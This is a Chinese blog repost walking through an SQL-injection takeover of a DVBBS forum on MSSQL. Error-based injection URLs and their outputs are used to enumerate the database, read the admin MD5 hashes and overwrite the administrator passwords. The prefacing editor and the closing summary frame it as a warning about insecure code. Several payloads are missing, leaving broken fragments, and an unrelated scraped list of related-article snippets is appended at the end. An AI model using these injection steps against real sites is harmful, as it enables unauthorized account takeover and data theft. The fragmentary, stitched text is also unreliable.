编辑前言:
  这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个sqlserver库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是sa帐号,就更是麻烦了。
  正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的入侵行为,在编程中减少安全漏洞是我们每个程序员要注意的。而站长在组合使用多个程序的时候,也要注意安全和程序的完整性。
  在我所了解的多个动网7.0 sp2 的版本也有2-3次被黑现象,所以大家还要及时注意升级,详细进行权限设置。并不是说动网不好,而是说他程序的开放性,用的人很多,找出来的bug会很多,软件学里说了,用的越多,bug会越多。相对来说,我喜欢自己定制化开发的程序,相对来说会安全一些。
下面是六中男孩的正文
  现在动网最新版本是7.0 sp2。应该说安全性已经是很高的了。所以从脚本本身的问题去突破它难度不小。但是我们可以从外部的一些途径间接“搞定”动网.现在iis asp sql2000的组合是比较常见的。而一个网站运用大量的asp脚本程序,难免不出纰漏。如果一台主机上存在某个sql注入点,而这台主机又安装有动网sql版的话,基本上可以得出结论:这个动网就是你的了。下面来看一下实例。
  一、 首先确定目标。假设以下url存在sql注入:

程序代码:
 
http://www.loveyou.com/type.asp?id=6 测试能否注入可以在6后面加个单引号。
返回错误提示:
ole db provider for odbc drivers 错误 80040e14
[][odbc sql server driver][sql server]字符串 之前有未闭合的引号。

  继续,先探测一下系统版本:
 
 程序代码:

http://www.loveyou.com/type.asp?id=(select @@version)--
返回: ole db provider for odbc drivers 错误 80040e07
[][odbc sql server driver][sql server]将 nvarchar 值 sql server 2000 - 8.00.760 ( x86) dec 17 2002 14:22:05 copyright (c) 1988-2003 corporation standard edition on windows nt 5.0 (build 2195: service pack 4) 转换为数据类型为 int 的列时发生语法错误。
看来已经打上最新的sp4补丁。

  取得当前连接数据库用户:
 
 程序代码:

http://www.loveyou.com/type.asp?id=(select user_name())--
返回: ole db provider for odbc drivers 错误 80040e07
[][odbc sql server driver][sql server]将 nvarchar 值 webuser 转换为数据类型为 int 的列时发生语法错误。
从错误信息中得到当前数据库用户为:webuser

  取得当前连接数据库名:

程序代码:
 
http://www.loveyou.com/type.asp?id=(select db_name())--
返回: ole db provider for odbc drivers 错误 80040e07
[][odbc sql server driver][sql server]将 nvarchar 值 01city 转换为数据类型为 int 的列时发生语法错误。
从错误信息中得到当前数据库名为: 01city
  接下来测试下权限:(注:因为我们的目的是搞定动网而不是侵占系统。所以数据库权限对我们不是很重要。)

程序代码:
 
http://www.loveyou.com/type.asp?id=(select is_srvrolemember(sysadmin))--
返回错误信息。提示当前记录已删除。看来权限果然不是很高耶。继续,

正常显示信息,看来连接数据库拥有的权限是db_owner(down数据库所有者。但对操纵数据是绰绰有余了。

  二.得到数据库表名。不出意外的话动网的各个表就存在于当前数据库01city中。
  首先得到第一个表:

程序代码:
 
http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype=u and status>0 and name not in())--
返回:[][odbc sql server driver][sql server]将 nvarchar 值 address 转换为数据类型为 int 的列时发生语法错误。
好的,第一个表名出来了,为: address
继续,

返回: admin 第二个表名也出来了。依次类推, 提交:
,admin,...))--

  可以得到当前数据库中所有表名。
  不一会儿,结果出来了, 表名好眼熟啊。
address,admin,bbslink,bbsnews,board,user.........傻瓜都看的出这是动网的表。当然还有其它的一些表,我们不去管它。
  接下来就好办了,也不要去猜字段了,我们打开自己的动网数据库看一下就知道了。 既然有了表名,字段名,那么,动网不就在你掌握之下了吗? 但千万不要 drop table啊。 破坏就不好了。我们的目的是演练技术,提高水平。 好,那么,我们去得到动网的后台。
  三、进入后台,取得动网论坛管理员权限。

程序代码:

先看看后台有多少个管理员:

返回错误: 当前的记录已被删除。说明管理员少于4位。直接提交,

正常显示信息,看来管理员只有一个,读出管理员名字,

出来了,管理员后台登陆名为: 01city
继续读出管理员后台登陆密码:

很顺利,密码为: e7cc01be0e33a273
是md5加密过的。难道要去破解它吗? 别急,根本不需要去破md5密码。
由于动网后台管理是cookie session认证。所以只有管理员在前台登陆才可以进后台管理,一般用户是无法进后台管理的。即使后台用户和密码都知道的情况下也一样。所以我们还要取得前台管理的用户和密码。 这个很容易,在他论坛注册一个用户查看一下管理团队,得出,前台管理用户为: admin

  好,得到他的密码:
 
 
 程序代码:
 
http://www.loveyou.com/type.asp?id=(select userpassword from user where username=admin)--
返回,admin的前台密码为:e7cc01be0e33a273
同样是md5的。 现在利用cookie欺骗可以登陆它的前台管理了。但是还有别的办法吗?别忘了现在我们可是对它的数据库拥有生杀大权哦。聪明的你可能想到了,对 ,就是,update。 我们来提交:
;--
正常返回信息,应该成功执行了,查看一下:

返回值为: 49ba59abbe56e057
更改密码成功,说明一下,这个16位md5是预先算好的。你要知道它的明文密码。
那么同样的,我们更改一下后台的管理密码.先把后台用户改成和前台用户一样的,提交:

查看一下:

程序代码:
 
http://www.loveyou.com/type.asp?id=(select username from admin)--
更改成功,后台管理员现在已变成:admin 接下来更改密码,提交:

 查看一下:
 
 程序代码:
 
http://www.loveyou.com/type.asp?id=(select password from admin)--
更改成功,后台管理员密码已经变成:49ba59abbe56e057

到这里为止,动网已彻底沦陷。你可以用admin登陆前台然后再用相同的密码进后台管理了。
四、总结
  就这样并不算太艰难的实现了对动网的控制。通过这次善意的渗透测试,也暴露出sql injection攻击的可怕性。而对于iis asp sql2000的虚拟主机来说简直就是防不胜防。只要主机上有一个sql注入点的话,动网就将面临灭顶之灾了。而其实从服务器庞大的网站程序中找一个这样的sql注入点并不算难事.正应征了一句老话:千里之堤,溃于蚁穴。所以防范这样的攻击的最好办法是加强程序代码的安全性。安全是个整体,任何细微的错误都有可能导致严重后果

转载于:https://www.cnblogs.com/battler/archive/2005/01/26/97770.html

SQL注入入侵动网站(MSSQL)相关推荐

  1. 再谈SQL注入入侵动网SQL版

    再谈SQL注入入侵动网SQL版  编辑前言: 这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞.说到底和动网没有什么关系,但因 ...

  2. SQL注入入侵动网SQL

    编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞.说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据 ...

  3. SQL注入入侵动网SQL版论坛

    现在动网最新版本是7.0+SP2.应该说安全性已经是很高的了.所以从脚本本身的问题去突破它难度不小.但是我们可以从外部的一些途径间接"搞定"动网.现在IIS+ASP+SQL2000 ...

  4. html页面sql注入,再谈SQL注入入侵动网SQL版-ASP TO HTML WITH TEMPLATE3

    5,处理数据功能显示页面addit.asp 首先是处理接受过来的数据,并将值写入数据库:接着将模板代码进行引用,并将其中特殊代码转换为接受值,最终通过FSO生成HTML页面.其中需要注意的还有,生成文 ...

  5. inurl+:php?id,实操:SQL注入国外xx网站

    原标题:实操:SQL注入国外xx网站 来自公众号:孑蝉 前言: 学了SQL注入一段时间了,也在顺利通关过墨者靶场.不过,靶场哪有真实网站好玩? 何为sql注入? SQL注入就是SQL+注入,不清楚可以 ...

  6. 记一次成功的sql注入入侵检测附带sql性能优化

    很多同学和园友都遇到过sql注入的,其中大部分都是代码的不严谨造成的,都是犯过很多错误才学会认真起来. 但是如果是让你接手一个二等残废的网站,并让你在上面改版,而且不能推翻式改版,只能逐步替换旧的程序 ...

  7. 实操:sql注入国外xx网站

    作者丨程橙橙 来源丨孑蝉(jiechan-aci) 前言: 学了sql注入一段时间了,也在顺利通关过墨者靶场.不过,靶场哪有真实网站好玩? 何为sql注入? sql注入就是sql+注入,不清楚可以百度 ...

  8. SQL注入黑客防线网站实例分析

    今天到黑防站上去看看文章,可能出于"职业"习惯,看到?classid=1之类的东东就不由自主的想加点什么参数进去.     当在页面 http://www.hacker.com.c ...

  9. sql注入 练手网站_新手渗透测试训练营——SQL注入

    学习渗透测试,一定要掌握各种漏洞的检测和利用方法.今天我们分析一下dvwa环境中sql注入从低级到高级的渗透步骤. 手动挖掘Sql注入,首先要发现注入点.以low级别为例,发现一个可以输入内容的文本框 ...

  10. 标准SQL注入入侵语句

    1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0<>(selec ...

最新文章

  1. 第1章 信息检索基础
  2. 掌握管理Linux磁盘和分区的方法 创建并挂载文件系统以及 创建并管理LVM
  3. Java中long和Long有什么区别
  4. flex+php截图Demo
  5. 数值范围_数值模拟在铸造业中的发展
  6. 【Python基础入门系列】第03天:Python 变量与数据类型
  7. Apache Flink,流计算?不仅仅是流计算!
  8. 机器视觉系统中相机镜头选型技巧_工业相机在机器视觉系统中的地位和作用
  9. java参数值注入_在springboot中使用注解将值注入参数的操作
  10. 如何调整一个 IFrame 到其内容的大小不显示滚动条[微软帮助]
  11. plt.plot绘图
  12. realsched.exe进程
  13. 朗逸发动机型号css和ea211的区别,css发动机是ea211吗
  14. 智能车PCB设计思路
  15. 卡内基梅隆大学计算机世界排名,卡内基梅隆大学世界排名多少?
  16. fiddler视频分析
  17. 第4周项目4:程序分析(2)
  18. PCI Device Class Codes
  19. python批量提取word指定内容_python批量提取word内信息
  20. 【STM32】标准库与HAL库对照学习教程六--位带操作

热门文章

  1. IPFS - 可快速索引的版本化的点对点文件系统
  2. Facebook受邀者的邮箱地址披露
  3. 复合函数求导定义证明_复合函数求导公式如何证明?
  4. 2022年考研华中科技大学计算机学院硕士后记
  5. 计算机博士专业学位,计算机博士
  6. android自定义控件
  7. plc梯形图如何转c语言,梯形图和指令怎么转换?plc梯形图转换指令表
  8. 电脑自动出现html文件,电脑自动弹出很多网页怎么办?
  9. 大数据项目之深圳地铁大数据客流分析系统
  10. 17-chan原理1-创建